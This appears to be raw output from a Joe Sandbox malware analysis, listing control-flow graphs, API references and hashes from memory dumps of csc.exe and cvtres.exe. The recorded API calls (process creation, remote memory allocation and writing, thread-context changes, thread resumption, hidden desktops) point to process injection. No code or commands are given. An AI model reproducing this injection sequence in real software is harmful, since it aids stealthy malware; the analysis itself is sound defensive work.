                                    control_flow_graph 419 5825540-58255dd 421 5825616-5825636 419->421 422 58255df-58255e9 419->422 427 5825638-5825642 421->427 428 582566f-582569e 421->428 422->421 423 58255eb-58255ed 422->423 425 5825610-5825613 423->425 426 58255ef-58255f9 423->426 425->421 429 58255fb 426->429 430 58255fd-582560c 426->430 427->428 432 5825644-5825646 427->432 436 58256a0-58256aa 428->436 437 58256d7-582579f CreateProcessA 428->437 429->430 430->430 431 582560e 430->431 431->425 433 5825648-5825652 432->433 434 5825669-582566c 432->434 438 5825656-5825665 433->438 439 5825654 433->439 434->428 436->437 440 58256ac-58256ae 436->440 450 58257a1-58257a7 437->450 451 58257a8-5825838 437->451 438->438 441 5825667 438->441 439->438 442 58256b0-58256ba 440->442 443 58256d1-58256d4 440->443 441->434 445 58256be-58256cd 442->445 446 58256bc 442->446 443->437 445->445 447 58256cf 445->447 446->445 447->443 450->451 460 582583a-582583e 451->460 461 5825848-582584c 451->461 460->461 462 5825840-5825843 call 5820190 460->462 463 582584e-5825852 461->463 464 582585c-5825860 461->464 462->461 463->464 466 5825854-5825857 call 5820190 463->466 467 5825862-5825866 464->467 468 5825870-5825874 464->468 466->464 467->468 470 5825868-582586b call 5820190 467->470 471 5825886-582588d 468->471 472 5825876-582587c 468->472 470->468 474 58258a4 471->474 475 582588f-582589e 471->475 472->471 477 58258a5 474->477 475->474 477->477
                                    APIs
                                    • CreateProcessA.KERNELBASE(?,?,?,?,?,?,?,?,?,?), ref: 0582578C
                                    Memory Dump Source
                                    • Source File: 0000000A.00000002.1447495448.0000000005820000.00000040.00000800.00020000.00000000.sdmp, Offset: 05820000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_10_2_5820000_csc.jbxd
                                    Similarity
                                    • API ID: CreateProcess
                                    • String ID:
                                    • API String ID: 963392458-0
                                    • Opcode ID: fdc40b86fbe6bddcd5cbdb3d4374f1da16e37cb706bf832d516ec35a1ad7c0a2
                                    • Instruction ID: d81291041efd471ed948f5acf29df77ceb5e1e959fd43284927e73ea476548dd
                                    • Opcode Fuzzy Hash: fdc40b86fbe6bddcd5cbdb3d4374f1da16e37cb706bf832d516ec35a1ad7c0a2
                                    • Instruction Fuzzy Hash: 58A15A71D402299FDB20DFA9C845BEEBBB1BF48310F1485A9D819EA240DB749DC5CF91

                                    Control-flow Graph

                                    control_flow_graph 240 5822c78-5822d15 243 5822d17-5822d21 240->243 244 5822d4e-5822d6e 240->244 243->244 245 5822d23-5822d25 243->245 251 5822d70-5822d7a 244->251 252 5822da7-5822dd6 244->252 246 5822d27-5822d31 245->246 247 5822d48-5822d4b 245->247 249 5822d33 246->249 250 5822d35-5822d44 246->250 247->244 249->250 250->250 253 5822d46 250->253 251->252 254 5822d7c-5822d7e 251->254 258 5822dd8-5822de2 252->258 259 5822e0f-5822ed7 CreateProcessA 252->259 253->247 256 5822d80-5822d8a 254->256 257 5822da1-5822da4 254->257 260 5822d8e-5822d9d 256->260 261 5822d8c 256->261 257->252 258->259 262 5822de4-5822de6 258->262 272 5822ee0-5822f70 259->272 273 5822ed9-5822edf 259->273 260->260 263 5822d9f 260->263 261->260 264 5822de8-5822df2 262->264 265 5822e09-5822e0c 262->265 263->257 267 5822df6-5822e05 264->267 268 5822df4 264->268 265->259 267->267 269 5822e07 267->269 268->267 269->265 282 5822f72-5822f76 272->282 283 5822f80-5822f84 272->283 273->272 282->283 284 5822f78-5822f7b call 5820190 282->284 285 5822f86-5822f8a 283->285 286 5822f94-5822f98 283->286 284->283 285->286 288 5822f8c-5822f8f call 5820190 285->288 289 5822f9a-5822f9e 286->289 290 5822fa8-5822fac 286->290 288->286 289->290 292 5822fa0-5822fa3 call 5820190 289->292 293 5822fbe-5822fc5 290->293 294 5822fae-5822fb4 290->294 292->290 296 5822fc7-5822fd6 293->296 297 5822fdc-5823018 293->297 294->293 296->297 300 582301a-582301e 297->300 301 5822fb8-5822fbd 297->301 302 5823020-5823024 300->302 303 5823025-5823090 call 5821d18 300->303 301->293 302->303 311 5823092 303->311 312 58230a5-58230e3 303->312 417 5823094 call 5823878 311->417 418 5823094 call 5823869 311->418 319 58230e5-5823113 312->319 320 582311b-5823235 call 5821d24 312->320 313 582309a 313->312 319->320 413 5823238 call 5823011 320->413 414 5823238 call 5822f64 320->414 415 5823238 call 5822c78 320->415 416 5823238 call 5822c6c 320->416 341 582323a-58232a0 call 5821d30 353 58232a6-58233dc 341->353 354 
58233e9-5823415 341->354 411 58233de call 5824b10 353->411 412 58233de call 5824b20 353->412 363 5823566-582356d 354->363 364 582341b-5823559 354->364 364->363 405 58233e4 405->363 411->405 412->405 413->341 414->341 415->341 416->341 417->313 418->313
                                    APIs
                                    • CreateProcessA.KERNELBASE(?,?,?,?,?,?,?,?,?,?), ref: 05822EC4
                                    Memory Dump Source
                                    • Source File: 0000000A.00000002.1447495448.0000000005820000.00000040.00000800.00020000.00000000.sdmp, Offset: 05820000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_10_2_5820000_csc.jbxd
                                    Similarity
                                    • API ID: CreateProcess
                                    • String ID:
                                    • API String ID: 963392458-0
                                    • Opcode ID: 9a3828c8bcd009ac59b5ae41f4b12f4553d94f93cf002b74c7628ad3b6dfc4e9
                                    • Instruction ID: 2347540ddb3ad664686465597dcd140b23b3ec63b4b82bdcfd040395613f29d8
                                    • Opcode Fuzzy Hash: 9a3828c8bcd009ac59b5ae41f4b12f4553d94f93cf002b74c7628ad3b6dfc4e9
                                    • Instruction Fuzzy Hash: 21A15B75D002299FEB24DFA9C841BEDBBB1FF48310F1485A9E81AE6240DB749D85CF91

                                    Control-flow Graph

                                    control_flow_graph 478 58247f4-5824861 481 5824863-582486d 478->481 482 582489a-58248f6 CreateDesktopA 478->482 481->482 483 582486f-5824871 481->483 489 58248f8-58248fe 482->489 490 58248ff-5824930 482->490 484 5824873-582487d 483->484 485 5824894-5824897 483->485 487 5824881-5824890 484->487 488 582487f 484->488 485->482 487->487 491 5824892 487->491 488->487 489->490 494 5824932-5824936 490->494 495 5824940 490->495 491->485 494->495 496 5824938-582493b call 5820190 494->496 497 5824941 495->497 496->495 497->497
                                    APIs
                                    • CreateDesktopA.USER32(?,?,?,?,?,?,?), ref: 058248E6
                                    Memory Dump Source
                                    • Source File: 0000000A.00000002.1447495448.0000000005820000.00000040.00000800.00020000.00000000.sdmp, Offset: 05820000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_10_2_5820000_csc.jbxd
                                    Similarity
                                    • API ID: CreateDesktop
                                    • String ID:
                                    • API String ID: 3054513912-0
                                    • Opcode ID: 0457b839c5d6ad07d2f30cc789bc50e120e166f5bf7ee2dcf75537f3421eafe0
                                    • Instruction ID: 1d3521905ec4ccf89af58cfa8cd400e5cd187e6648036bc786d8efa6b3c57098
                                    • Opcode Fuzzy Hash: 0457b839c5d6ad07d2f30cc789bc50e120e166f5bf7ee2dcf75537f3421eafe0
                                    • Instruction Fuzzy Hash: C04122B1D102A99FDF11CFA9D885BDEBFF2BB08310F148129E815A7660C7759885CFA1

                                    Control-flow Graph

                                    control_flow_graph 519 58229e8-58229ee 520 58229f0-58229f4 519->520 521 58229f5-5822a3e 519->521 520->521 523 5822a40-5822a4c 521->523 524 5822a4e-5822a8d WriteProcessMemory 521->524 523->524 526 5822a96-5822ac6 524->526 527 5822a8f-5822a95 524->527 527->526
                                    APIs
                                    • WriteProcessMemory.KERNELBASE(?,?,00000000,?,?), ref: 05822A80
                                    Memory Dump Source
                                    • Source File: 0000000A.00000002.1447495448.0000000005820000.00000040.00000800.00020000.00000000.sdmp, Offset: 05820000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_10_2_5820000_csc.jbxd
                                    Similarity
                                    • API ID: MemoryProcessWrite
                                    • String ID:
                                    • API String ID: 3559483778-0
                                    • Opcode ID: 518526fe93c8c79a22c4847a66ffe1bf3aa68c4509d70ca8141f272db0eb5bfa
                                    • Instruction ID: ff16c48a3a3c1f6dd68b1637e6b99133e7c3961398c42bde767e9457d3a045a1
                                    • Opcode Fuzzy Hash: 518526fe93c8c79a22c4847a66ffe1bf3aa68c4509d70ca8141f272db0eb5bfa
                                    • Instruction Fuzzy Hash: 05213775D003599FDB20CFA9C881BEEBBF5FF48320F508429E919A7640D7789941CBA0

                                    Control-flow Graph

                                    control_flow_graph 531 58229f0-5822a3e 534 5822a40-5822a4c 531->534 535 5822a4e-5822a8d WriteProcessMemory 531->535 534->535 537 5822a96-5822ac6 535->537 538 5822a8f-5822a95 535->538 538->537
                                    APIs
                                    • WriteProcessMemory.KERNELBASE(?,?,00000000,?,?), ref: 05822A80
                                    Memory Dump Source
                                    • Source File: 0000000A.00000002.1447495448.0000000005820000.00000040.00000800.00020000.00000000.sdmp, Offset: 05820000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_10_2_5820000_csc.jbxd
                                    Similarity
                                    • API ID: MemoryProcessWrite
                                    • String ID:
                                    • API String ID: 3559483778-0
                                    • Opcode ID: a9ac4250a1f09eafc4d3b78c9a7e479bf30dd951e49205ddd1a06cb7c6bb152f
                                    • Instruction ID: 7934f106bebff807812d49f3d370fc71a5d875d897b2429a0f92418637a50b67
                                    • Opcode Fuzzy Hash: a9ac4250a1f09eafc4d3b78c9a7e479bf30dd951e49205ddd1a06cb7c6bb152f
                                    • Instruction Fuzzy Hash: 28212575D003599FDB20DFAAC881BEEBBF5FF48310F50842AE919A7240D7789944CBA4

                                    Control-flow Graph

                                    control_flow_graph 542 5824a40-5824a94 546 5824a96-5824a99 542->546 547 5824a9c-5824ae7 CreateDesktopW 542->547 546->547 548 5824af0-5824b0d 547->548 549 5824ae9-5824aef 547->549 549->548
                                    APIs
                                    • CreateDesktopW.USER32(00000000,?,?,?,?,?,?,?), ref: 05824ADA
                                    Memory Dump Source
                                    • Source File: 0000000A.00000002.1447495448.0000000005820000.00000040.00000800.00020000.00000000.sdmp, Offset: 05820000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_10_2_5820000_csc.jbxd
                                    Similarity
                                    • API ID: CreateDesktop
                                    • String ID:
                                    • API String ID: 3054513912-0
                                    • Opcode ID: d6960fd84e9671d4b9e794024b2f8b119ea141fdd63f9419450844db61d48e5d
                                    • Instruction ID: 08332e7b907e417fd50fd549d535a64de6a3c29c7d4922fff5b9df92b22a689e
                                    • Opcode Fuzzy Hash: d6960fd84e9671d4b9e794024b2f8b119ea141fdd63f9419450844db61d48e5d
                                    • Instruction Fuzzy Hash: 9421F5B5D0121AAFCB10CF99D985ADEFFB4FF48320F10812AE919A3250C775A955CFA4

                                    Control-flow Graph

                                    control_flow_graph 552 5822850-5822856 553 5822858-582285c 552->553 554 582285d-58228a3 552->554 553->554 556 58228b3-58228e3 Wow64SetThreadContext 554->556 557 58228a5-58228b1 554->557 559 58228e5-58228eb 556->559 560 58228ec-582291c 556->560 557->556 559->560
                                    APIs
                                    • Wow64SetThreadContext.KERNEL32(?,00000000), ref: 058228D6
                                    Memory Dump Source
                                    • Source File: 0000000A.00000002.1447495448.0000000005820000.00000040.00000800.00020000.00000000.sdmp, Offset: 05820000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_10_2_5820000_csc.jbxd
                                    Similarity
                                    • API ID: ContextThreadWow64
                                    • String ID:
                                    • API String ID: 983334009-0
                                    • Opcode ID: 1ffe0b6397b0dec1b9f1b258a827f1c2f77f7c86f6f27f3fd054dd3ffa907cb9
                                    • Instruction ID: db3c44112c641774fa5818a3053c5399d505b7c5258cb0dd42cc1cdbe28ad51c
                                    • Opcode Fuzzy Hash: 1ffe0b6397b0dec1b9f1b258a827f1c2f77f7c86f6f27f3fd054dd3ffa907cb9
                                    • Instruction Fuzzy Hash: FA215975D003099FDB10DFAAC481BEEBBF4EF48320F548429D919A7640DB789986CFA5

                                    Control-flow Graph

                                    control_flow_graph 564 5824a48-5824a94 566 5824a96-5824a99 564->566 567 5824a9c-5824ae7 CreateDesktopW 564->567 566->567 568 5824af0-5824b0d 567->568 569 5824ae9-5824aef 567->569 569->568
                                    APIs
                                    • CreateDesktopW.USER32(00000000,?,?,?,?,?,?,?), ref: 05824ADA
                                    Memory Dump Source
                                    • Source File: 0000000A.00000002.1447495448.0000000005820000.00000040.00000800.00020000.00000000.sdmp, Offset: 05820000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_10_2_5820000_csc.jbxd
                                    Similarity
                                    • API ID: CreateDesktop
                                    • String ID:
                                    • API String ID: 3054513912-0
                                    • Opcode ID: ba5d87b00c607acdbe152d52217b8111b93d72fecd07e566a55c4e6383ff4de3
                                    • Instruction ID: c0ce2394f102afe7f16d37b22997cda680c6089732633d6b8ff1f99b8220fda3
                                    • Opcode Fuzzy Hash: ba5d87b00c607acdbe152d52217b8111b93d72fecd07e566a55c4e6383ff4de3
                                    • Instruction Fuzzy Hash: 3021F0B5D0121AAFCB10CF99D984ADEFBB4FB08320F10812AE919A3250C775A955CFA4

                                    Control-flow Graph

                                    control_flow_graph 572 5822ad8-5822b6d ReadProcessMemory 576 5822b76-5822ba6 572->576 577 5822b6f-5822b75 572->577 577->576
                                    APIs
                                    • ReadProcessMemory.KERNELBASE(?,?,?,?,?), ref: 05822B60
                                    Memory Dump Source
                                    • Source File: 0000000A.00000002.1447495448.0000000005820000.00000040.00000800.00020000.00000000.sdmp, Offset: 05820000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_10_2_5820000_csc.jbxd
                                    Similarity
                                    • API ID: MemoryProcessRead
                                    • String ID:
                                    • API String ID: 1726664587-0
                                    • Opcode ID: 199087510ffc69137006025c070fcf4c10c7a4ad5b1bbe189e0503b5f3750aa8
                                    • Instruction ID: 599a1a9ebd3e68783824e712a84d31563ad92e56fcf0590d88899a05962df118
                                    • Opcode Fuzzy Hash: 199087510ffc69137006025c070fcf4c10c7a4ad5b1bbe189e0503b5f3750aa8
                                    • Instruction Fuzzy Hash: 21212475C003499FDB10DFAAC884BEEBBF5FF48310F54842AE959A3240D7799940CBA4

                                    Control-flow Graph

                                    control_flow_graph 581 5822858-58228a3 584 58228b3-58228e3 Wow64SetThreadContext 581->584 585 58228a5-58228b1 581->585 587 58228e5-58228eb 584->587 588 58228ec-582291c 584->588 585->584 587->588
                                    APIs
                                    • Wow64SetThreadContext.KERNEL32(?,00000000), ref: 058228D6
                                    Memory Dump Source
                                    • Source File: 0000000A.00000002.1447495448.0000000005820000.00000040.00000800.00020000.00000000.sdmp, Offset: 05820000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_10_2_5820000_csc.jbxd
                                    Similarity
                                    • API ID: ContextThreadWow64
                                    • String ID:
                                    • API String ID: 983334009-0
                                    • Opcode ID: 1d95b7a752c7f66db9bf25948d61ad0cb088d0af15325f92edb60d8de1c57b8b
                                    • Instruction ID: e7f065bc2f50b0f821c9ab8ca8a72b37ea03a8c4640d81b4da13c4301f0d053d
                                    • Opcode Fuzzy Hash: 1d95b7a752c7f66db9bf25948d61ad0cb088d0af15325f92edb60d8de1c57b8b
                                    • Instruction Fuzzy Hash: 22213875D003098FDB10DFAAC485BEEBBF4EF48310F548429D919A7640CB789945CFA4

                                    Control-flow Graph

                                    control_flow_graph 592 5822ae0-5822b6d ReadProcessMemory 595 5822b76-5822ba6 592->595 596 5822b6f-5822b75 592->596 596->595
                                    APIs
                                    • ReadProcessMemory.KERNELBASE(?,?,?,?,?), ref: 05822B60
                                    Memory Dump Source
                                    • Source File: 0000000A.00000002.1447495448.0000000005820000.00000040.00000800.00020000.00000000.sdmp, Offset: 05820000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_10_2_5820000_csc.jbxd
                                    Similarity
                                    • API ID: MemoryProcessRead
                                    • String ID:
                                    • API String ID: 1726664587-0
                                    • Opcode ID: d6d860d7eb912f4a816c1161e1771cba1f7b62bac652631397998dc7963f1866
                                    • Instruction ID: 4f322ec3b40559051098719d30601c8aedd35aaa674b663df79aaee15158437a
                                    • Opcode Fuzzy Hash: d6d860d7eb912f4a816c1161e1771cba1f7b62bac652631397998dc7963f1866
                                    • Instruction Fuzzy Hash: 89212575C003599FDB10DFAAC881BEEBBF5FF48310F50842AE919A7240C7799941CBA4

                                    Control-flow Graph

                                    control_flow_graph 600 5822928-58229ab VirtualAllocEx 603 58229b4-58229d9 600->603 604 58229ad-58229b3 600->604 604->603
                                    APIs
                                    • VirtualAllocEx.KERNELBASE(?,?,?,?,?), ref: 0582299E
                                    Memory Dump Source
                                    • Source File: 0000000A.00000002.1447495448.0000000005820000.00000040.00000800.00020000.00000000.sdmp, Offset: 05820000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_10_2_5820000_csc.jbxd
                                    Similarity
                                    • API ID: AllocVirtual
                                    • String ID:
                                    • API String ID: 4275171209-0
                                    • Opcode ID: 7037c3d84997ecfd0616c87a0eb62c08f3cbc1407f34291ee0fdfb498d891cd4
                                    • Instruction ID: d85745670201c0b977255cf79b26363faeec057b668598c68ff15f840c81a51c
                                    • Opcode Fuzzy Hash: 7037c3d84997ecfd0616c87a0eb62c08f3cbc1407f34291ee0fdfb498d891cd4
                                    • Instruction Fuzzy Hash: CF1164758003499FDB20DFAAC840BEEBFF1AF88324F548819E956A7240C7369951CBA0
                                    APIs
                                    • VirtualAllocEx.KERNELBASE(?,?,?,?,?), ref: 0582299E
                                    Memory Dump Source
                                    • Source File: 0000000A.00000002.1447495448.0000000005820000.00000040.00000800.00020000.00000000.sdmp, Offset: 05820000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_10_2_5820000_csc.jbxd
                                    Similarity
                                    • API ID: AllocVirtual
                                    • String ID:
                                    • API String ID: 4275171209-0
                                    • Opcode ID: 82162c3c996651ada8b39e40dc15a556e69fb2e681bd95f7d896a6428571ed4a
                                    • Instruction ID: 899d0515d5dc109e781d6b92398abefb9f07edb7330e7d2347cc632c6586c996
                                    • Opcode Fuzzy Hash: 82162c3c996651ada8b39e40dc15a556e69fb2e681bd95f7d896a6428571ed4a
                                    • Instruction Fuzzy Hash: EE1114758003499FDB20DFAAC845BDEBBF5AB88324F148419E915A7250CB759940CBA0
                                    APIs
                                    Memory Dump Source
                                    • Source File: 0000000A.00000002.1447495448.0000000005820000.00000040.00000800.00020000.00000000.sdmp, Offset: 05820000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_10_2_5820000_csc.jbxd
                                    Similarity
                                    • API ID: ResumeThread
                                    • String ID:
                                    • API String ID: 947044025-0
                                    • Opcode ID: 6f7f1a1cd050fa635defeb16286e92149f111913783dcd9c3a99b7082df97253
                                    • Instruction ID: 5950db874839adf36d2907b30751d56cd39875232e95ee8c3af670a9d3c09817
                                    • Opcode Fuzzy Hash: 6f7f1a1cd050fa635defeb16286e92149f111913783dcd9c3a99b7082df97253
                                    • Instruction Fuzzy Hash: 9F1188B1D003488FDB20DFAAC445BEEFFF4AF88320F248419D919A7240CB75A941CB94
                                    APIs
                                    Memory Dump Source
                                    • Source File: 0000000A.00000002.1447495448.0000000005820000.00000040.00000800.00020000.00000000.sdmp, Offset: 05820000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_10_2_5820000_csc.jbxd
                                    Similarity
                                    • API ID: ResumeThread
                                    • String ID:
                                    • API String ID: 947044025-0
                                    • Opcode ID: e0a478ca10752dcb7925aefe94a894980ea7ac73c56ba1d7dd5c6b6319c945d2
                                    • Instruction ID: 0c331171a0d3920ec85ec97f4b7f7a18ba4df0ce4f5ad5b61f3ab622758fe10e
                                    • Opcode Fuzzy Hash: e0a478ca10752dcb7925aefe94a894980ea7ac73c56ba1d7dd5c6b6319c945d2
                                    • Instruction Fuzzy Hash: 51112875D003498FDB20DFAAC445BDEFBF5AB48324F248419D519A7240CB756945CB94
                                    APIs
                                    Memory Dump Source
                                    • Source File: 0000000A.00000002.1447495448.0000000005820000.00000040.00000800.00020000.00000000.sdmp, Offset: 05820000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_10_2_5820000_csc.jbxd
                                    Similarity
                                    • API ID: ResumeThread
                                    • String ID:
                                    • API String ID: 947044025-0
                                    • Opcode ID: 0a7f807c2eee09b85208eab72547774a0bacb105a9115f257614101d001e3769
                                    • Instruction ID: 76d97cdd492e4d4c6911d18de9527753c07ae6f3f78afbe743b19d945e4b8f90
                                    • Opcode Fuzzy Hash: 0a7f807c2eee09b85208eab72547774a0bacb105a9115f257614101d001e3769
                                    • Instruction Fuzzy Hash: F2F08473A083908FE7209769C8183E9BFF0EF92320F24808AC49FCB560D2399886C751
                                    Memory Dump Source
                                    • Source File: 0000000C.00000002.2506142182.000000000125D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0125D000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_12_2_125d000_cvtres.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: a1998f90c64352c7f85b716ddd9e6b9586c4aaf1318dbf32530b2b0d599778d7
                                    • Instruction ID: 1645b7e086e428b6525917335697830af7a68dddf00dcdf747b4f77a90519bc8
                                    • Opcode Fuzzy Hash: a1998f90c64352c7f85b716ddd9e6b9586c4aaf1318dbf32530b2b0d599778d7
                                    • Instruction Fuzzy Hash: B1212371624308DFDB61DF54D9C4B26BB65FB84364F20C569ED490B342C37AD44BCAA2
                                    Memory Dump Source
                                    • Source File: 0000000C.00000002.2506142182.000000000125D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0125D000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_12_2_125d000_cvtres.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: 7350bac7b972eb764e157d6d5a347e089619cd5449d42b214ee64f36f908ce82
                                    • Instruction ID: 61510ece4b272e0e0bd092fbc95192ba643bfda4bbdd23a86c10f276629b35ec
                                    • Opcode Fuzzy Hash: 7350bac7b972eb764e157d6d5a347e089619cd5449d42b214ee64f36f908ce82
                                    • Instruction Fuzzy Hash: 382122B5A14308DFDB45DF94D9C0B16BB61FB84324F20C56DDD098B287C776D846CA62
                                    Memory Dump Source
                                    • Source File: 0000000C.00000002.2506142182.000000000125D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0125D000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_12_2_125d000_cvtres.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: 162b121a473dab6e416c293d5c92dd64702b345b5c524d1d25d196d128461c53
                                    • Instruction ID: 628b7501aa82eaea5ccf37ee480222e3688d6d0915b3f65b352c7e23c4d087b8
                                    • Opcode Fuzzy Hash: 162b121a473dab6e416c293d5c92dd64702b345b5c524d1d25d196d128461c53
                                    • Instruction Fuzzy Hash: C521AE765093848FDB13CF24D9D0715BF71EB85324F28C5EAD9488B693C33A940ACB62
                                    Memory Dump Source
                                    • Source File: 0000000C.00000002.2506142182.000000000125D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0125D000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_12_2_125d000_cvtres.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: 4ccb17c466d2e34b86bde66ac975e9cbefd8e24c09005379d072ef0b40a0d1c0
                                    • Instruction ID: 1095fb20f6a05e2acaee0f50624a8f06fcaa47e7774ca4e8a9b7a573f901177d
                                    • Opcode Fuzzy Hash: 4ccb17c466d2e34b86bde66ac975e9cbefd8e24c09005379d072ef0b40a0d1c0
                                    • Instruction Fuzzy Hash: A011BB79504284DFDB06CF54D5C0B15BBA2FB84324F24C6ADDD498B297C33AD84ACB61